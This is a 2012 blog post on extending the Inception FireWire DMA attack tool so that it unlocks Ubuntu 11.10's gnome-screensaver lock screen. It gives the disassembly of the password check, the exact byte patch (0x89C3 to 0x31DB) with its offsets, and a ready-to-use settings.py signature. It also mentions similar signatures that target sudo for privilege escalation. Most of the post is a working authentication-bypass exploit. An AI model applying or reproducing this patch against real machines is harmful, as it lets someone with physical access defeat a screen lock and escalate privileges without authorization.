Firewire Attacks with Inception

23/02/2012 - 13:37 by Adel KHALDI

Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA written by Carsten Maartmann-Moe [1]. It could be used to patch the memory in order to modify the execution flow of a targeted process.

In order to unlock the Ubuntu 11.10 default screensaver on an x86 architecture, we have to generate patch signatures for Inception.

The signature generation process will be like the following:
  • Finding the correct condition to patch (bypass). The condition that checks the password.
  • Patching that condition (several patch are possible)
  • Testing
  • If it works, generating the Inception's signature for a FireWire attack

With IDA Free [2], open /usr/lib/gnome-screensaver/gnome-screensaver-dialog

Open gs_auth_verify_user() in IDA (function name found from the source code, in gnome-screensaver-3.2.0/src/gs-auth-pam.c)

The condition at 0x8052DFE checks the content of ebx, which must be set to 0x00 to not trigger the jnz (auth failure).

loc_8052DFE:
    test    ebx, ebx
    jnz     loc_8052BEA

All what we have to do is setting ebx to 0x00. We proceed like this:

In the original disassembled binaryi, before the targeted condition, we have:

loc_8052DDC:
    mov     [esp+7Ch+pipedes], edx
    call    _g_thread_join
    mov     ebx, eax

The patch is:

loc_8052DDC:
    mov     [esp+7Ch+pipedes], edx
    call    _g_thread_join
    xor     ebx, ebx

If you patch with hexadecimal editor, at offset 0xADE4 you have just to change 0x89C3 (mov ebx, eax) by 0x31DB (xor ebx, ebx).

Save, lock your screen and try any password. If it works, you can integrate it to inception.

The signature will be (to add in inception/settings.py):

{'OS': 'Ubuntu - Lockscreen',
    'versions': ['11.10'],
    'architectures': ['x32'],
    'name': 'Gnome lockscreen (gnome-screensaver) unlock',
    'notes': 'Disables Ubuntu lockscreen.',
    'signatures': [{'offsets': [0xDE4],
        'chunks': [{'chunk': 0x89C3,
        'internaloffset': 0x00,
        'patch': 0x31DB,
        'patchoffset': 0x00}]}]},

I've generated other signatures for Inception, they are available in the latest settings.py file, some of them are targetting /usr/bin/sudo for privileges escalating purposes.

Voila,
Adel

Comments

comments powered by Disqus